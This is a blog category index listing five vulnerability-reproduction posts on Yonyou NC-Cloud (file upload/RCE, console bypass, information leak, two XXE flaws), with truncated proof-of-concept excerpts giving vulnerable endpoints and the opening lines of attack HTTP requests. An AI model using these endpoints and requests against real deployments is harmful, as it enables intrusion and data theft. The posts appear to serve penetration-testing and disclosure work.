用友 - 随笔分类 - 都吃泡芙

用友-NC-Cloud存在任意文件上传/RCE

摘要：漏洞复现：首先上传jsp POC： POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: IP User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, l 阅读全文

posted @ 2024-06-26 16:45 都吃泡芙阅读(312) 评论(0) 推荐(0)

用友-NC-Cloud存在控制台绕过漏洞

摘要：漏洞复现： POC： /uapws/index.jsp 阅读全文

posted @ 2024-06-26 16:30 都吃泡芙阅读(161) 评论(0) 推荐(0)

用友-NC-Cloud存在接口信息泄露漏洞

摘要：漏洞复现： POC： /uapws/service 阅读全文

posted @ 2024-06-26 16:28 都吃泡芙阅读(121) 评论(0) 推荐(0)

用友-NC-Cloud存在XXE漏洞

摘要：漏洞复现： POC： /uapws/service/nc.uap.oba.update.IUpdateService?wsdl 阅读全文

posted @ 2024-06-26 16:26 都吃泡芙阅读(254) 评论(0) 推荐(0)

用友-NC-Cloud存在soapFormat-XXE 导致任意文件读取漏洞

摘要：漏洞复现： POC: POST /uapws/soapFormat.ajax HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 阅读全文

posted @ 2024-06-26 16:21 都吃泡芙阅读(223) 评论(0) 推荐(0)

pa0fu

随笔分类 - 渗透测试 / nday / 用友

公告